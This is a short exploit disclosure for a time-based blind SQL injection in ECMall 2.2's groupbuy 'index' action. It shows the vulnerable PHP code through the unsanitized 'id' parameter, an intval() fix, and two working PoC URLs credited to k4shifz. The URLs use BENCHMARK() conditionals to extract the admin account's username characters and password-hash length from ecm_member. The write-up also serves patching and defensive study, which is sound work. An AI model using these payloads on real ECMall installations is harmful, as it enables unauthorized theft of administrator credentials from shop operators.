ECMall 2.2 延迟注射 0day — time-based (blind) SQL injection in the groupbuy `index` action via the unsanitized `id` GET parameter
/**
 * Groupbuy "index" action: loads one groupbuy record (joined with its store)
 * selected by the `id` request parameter, or shows a warning if none matches.
 *
 * SECURITY (review): `$_GET['id']` is used without any filtering. The
 * `empty()` / `!$id` checks only reject "", "0" and 0 — a non-empty string
 * such as `2 and if(...)` passes straight through and is then concatenated
 * verbatim into the SQL `conditions` string, i.e. an SQL injection.
 * A non-matching (or injected) condition only produces the generic
 * 'no_such_groupbuy' warning, so neither query output nor a database error is
 * reflected to the client; the bug is a blind injection and is exploited
 * time-based (e.g. BENCHMARK() in a conditional, see the PoC below).
 *
 * FIX (review): coerce the value at the boundary so only an integer can reach
 * the query, e.g. `$id = empty($_GET['id']) ? 0 : intval($_GET['id']);`
 * (or bind it as a query parameter if the model layer supports that).
 *
 * NOTE(review): this excerpt ends after the "not found" branch; the remainder
 * of the method is not shown here.
 */
function index()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; // user-controlled and unsanitized; flows into the SQL below
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
// Groupbuy record: `$id` is concatenated directly into the WHERE clause -> SQL injection point
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id . ' AND gb.state<>' . GROUP_PENDING, // injection happens here
'join' => 'belong_store',
'fields' => 'gb.*,s.owner_name'
));
if (empty($group)) // no row (or an injected condition) just yields the generic warning: nothing is reflected, hence blind / time-based exploitation
{
$this->show_warning('no_such_groupbuy');
return;
}
Exploit (PoC) by k4shifz — both requests are time-based blind probes against the `id` parameter: the first makes MySQL spend time in BENCHMARK() only if the first character of `user_name` for `user_id=1` in `ecm_member` is 'a' (ASCII 97); the second delays only if the stored `password` for `user_id=1` is 32 characters long (the length of an MD5 hex digest). The trailing `%23` (`#`) or `--` comments out the rest of the original condition (`AND gb.state<>...`), so the response time alone leaks one bit per request:
/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23
/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)--